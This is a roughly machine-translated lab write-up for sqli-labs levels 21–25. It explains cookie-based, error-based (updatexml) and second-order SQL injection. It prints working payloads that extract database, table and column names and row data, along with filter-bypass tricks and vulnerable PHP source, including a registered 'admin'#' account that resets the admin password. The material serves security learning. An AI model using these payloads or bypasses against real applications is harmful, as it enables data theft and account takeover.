SQL lab 21~25 summary (subsequent continuous update) (including secondary injection explanation)

Twenty one levels

Input admin It seems that there is no difference

Let's capture the twenty-one level ：

Find it cookie There is a change , No, it's the last level admin, It's a bunch of random codes .

This is because ：admin There was one base64 code

$cookee = base64_decode($cookee);

We can decode it once ：

Discovery is admin.

The rest and 20 It's the same . Just turn the sentence into base64 The encryption

take ：admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) – q

Turn into ：YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIC0tIHEKCg==

Find out ：

This is because – q It is easy to make mistakes when transforming , So we must convert a method of commenting out the following sentences ： and ‘1’='1;

Let's analyze the source code ：

$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"

Now let's inject this statement ：

$sql="SELECT * FROM users WHERE username=(' 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1') LIMIT 0,1"

Observation found that ： sentence ‘$cookee’ The last single quotation mark in the middle and and ‘1’='1 combination So that it can be executed updatexml sentence .

therefore ：

• Query database name admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and ‘1’='1

• The query table name ：admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) and ‘1’='1

• Query the column name ：admin 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1) and ‘1’='1

• Query data ：admin 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and ‘1’='1

Level 22

View the original code ：

$cookee1 = '"'. $cookee. '"';
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

It is found that its package method is " "

Others and 21 It's the same ：

• Query database name admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and “1”="1

• The query table name ：admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) and “1”="1

• Query the column name ：admin "and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1) and “1”="1

• Query data ：admin "and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and “1”="1

Twenty three levels

We are familiar with get The ginseng ,

Input ?id=1’ and 1=2 – q

Find out ：

It does not recognize q So here The note does not take effect .

View source code , Find out ：

$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

preg_replace: Regular replacement functions , Can perform powerful callback functions , Add the regular modifier /e, Implement template engine compilation （ It's just string replacement ）. In this source code, if # perhaps – , Will be replaced by empty .

Again because ：

else 
	{
    
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}

So use error injection ：

eg ：?id=1’and updatexml(1,concat(0x7e,(select database()),0x7e),1)or ‘1’='1

Twenty-four

We found that secondary injection is needed ：

The secondary injection ： The malicious data constructed by the attacker is stored behind the database , Malicious data is read and entered into sql Resulting injection .

The secondary injection is mainly divided into two steps ：

1. Insert malicious data ：

   • When inserting data into the database for the first time , Only special characters are escaped , When writing to the database, the original data is retained , But the data itself contains malicious content .

2. Quoting malicious data ：

   • After storing the data in the database , Developers believe that the data is credible , The next time you need to query , Propose malicious data directly from the database , No further inspection and treatment , Will cause sql The second injection of

We register an account when we are doing 24 questions ：admin’# Then log in

Let's first look at its source code ：

<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
    
	if (!isset($_SESSION["username"])) 
	{
    
   		header('Location: index.php');
	}
	header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php

//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");



if (isset($_POST['submit']))
{
    
	
	
	# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{
    	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
    
			echo "Password successfully updated";
	
		}
		else
		{
    
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}
	else
	{
    
		echo '<font size="5" color="#FFFF00"><center>';
		echo "Make sure New Password and Retype Password fields have same value";
		header('refresh:2, url=index.php');
	}
}
?>
<?php
if(isset($_POST['submit1']))
{
    
	session_destroy();
	setcookie('Auth', 1 , time()-3600);
	header ('Location: index.php');
}
?>
</center>  
</body>
</html>

if$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{
    	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

We found a new function ：

    mysql_real_escape_string   

mysql_real_escape_string() Function escape SQL Special characters in strings used in statements .

The following characters are affected ：

• \x00
• \n
• \r
• \
• ’
• "
• \x1a

If it works , The function returns the escaped string . If you fail , Then return to false.

Tips ： This function can be used to prevent database attacks （sql Inject ）

So in the above source code Only username This function is not used , So only username It can be used sql Inject .

take admin’# Into it ：

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";($pass==$re_pass)

We found that admin Medium ’ As in the previous username='admin Form closure # Comment out the following statements ;

That is, if we use admin’# The user who changed the password （$pass==$re_pass)

The following statement will be executed ：

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";($pass==$re_pass)`

Implement changes admin Password .

Twenty five levels

Looking at the source code, we find ：

function blacklist($id)
{
    
	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)
	$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)
	
	return $id;
}

If you use and perhaps or notes , Will be preg_replace Replace with “ ”,

/or/i

i Indicates case insensitive , Regardless of writing and still AND Will be replaced （or） Empathy

So we can use it mysql Logical operators in （&& and and || or）

?id=1’ && 1=1 – q

Be careful ：& stay url Middle means multiple parameters

So when we use && Conduct url code （%26%26）

So in url Column input ：?id=1’ %26%26 1=2-- q

Continue to observe the source code ：

else 
	{
    
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  

Therefore, joint query cannot be used , Error injection can be performed .

But we will enter it later ?id=1’ and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1) – q

Find out

In error reporting ：

We found that ：information Turned into infmation, Less or Replaced by function

So we can put information Written as infoorrmation, After function replacement, it becomes information

Then you can inject errors .